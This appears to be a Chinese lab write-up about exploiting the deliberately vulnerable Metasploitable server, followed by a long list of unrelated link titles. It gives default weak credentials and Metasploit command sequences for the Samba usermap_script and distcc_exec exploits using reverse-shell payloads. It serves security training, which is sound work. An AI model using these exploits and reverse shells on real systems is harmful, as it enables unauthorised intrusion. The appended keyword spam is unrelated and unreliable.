Samba&distcc 漏洞
发表于:2025-01-21 作者:千家信息网编辑
千家信息网最后更新 2025年01月21日,漏洞测试确实是可以的 当时把文章copy下来进行再进行测试。但是没有copy到图片,实验是成功了,但是没有那么直观。使用metasploit对metasploitable 靶服务器进行***metas
千家信息网最后更新 2025年01月21日Samba&distcc 漏洞
漏洞测试确实是可以的 当时把文章copy下来进行再进行测试。但是没有copy到图片,实验是成功了,但是没有那么直观。
使用metasploit
对metasploitable 靶服务器进行***
metasploitable 是ubuntu8.0的版本
neuss扫描到漏洞
139端口可以获取该系统主机名为"METASPLOITABLE",注释"metasploitable server (Samba 3.0.20-Debian)";
系统存在弱口令,用户user、msfadmin密码与用户名一样,使用net use命令能够建立连接查看共享资源。ftp开放版本信息 ProFTPD 1.3.1 Server (Debian),user这个用户在ftp中也可以使用;
telnet服务开放,可确定该系统为Ubuntu 8.04,用户user、msfadmin可以登录,并获得相应权限。如果不存在弱口令,通过截获该telnet数据也能获取用户口令
一个distcc漏洞
一个samba 共享服务漏洞
msf对靶服务器的工具
smb-samba 共享服务
use exploit/multi/samba/usermap_script
set payload cmd/unix/reverse
set rhost (ip address)
set lhost (ip address)
exploit
use exploit/unix/misc/distcc_exec
set payload cmd/unix/reverse_perl
set rhost (ip address)
set lhost (ip address)
exploit
distcc 成功 但是没有root的权限
用户
服务
漏洞
口令
系统
成功
服务器
权限
版本
开放
测试
直观
主机
信息
共享资源
命令
图片
密码
工具
数据
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
5g题库之软件开发应知应会
C语言答案软件开发
手抄报设计图软件开发
sql修复数据库
亚马逊云有香港服务器吗
数据库营销的策略
古冶公安网络安全大队
奉贤区品牌软件开发厂家报价
英雄杀什么区什么服务器
如何提升网络安全预警防范能力
软件开发交接需要哪些注意的
软件开发者点数不足怎么回事
嵌入式设计与软件开发哪个好
服务器CPU做图搞设计
服务器磁盘数据如何备份
成都会展中心网络安全展
mvc数据库语句
促进网络安全与信息化工作
数据库延迟高
欲哥服务器
英雄联盟适合练英雄的服务器
丽江创建网站java软件开发
政治关联数据库
数据库 文字可以吗
飞扬时光服务器请求没有成功
最流行的数据库属于
房山区通用网络技术客户至上
计算机网络技术的知识讲解
中兴南京软件开发二部
利用微信转账截图诈骗软件开发者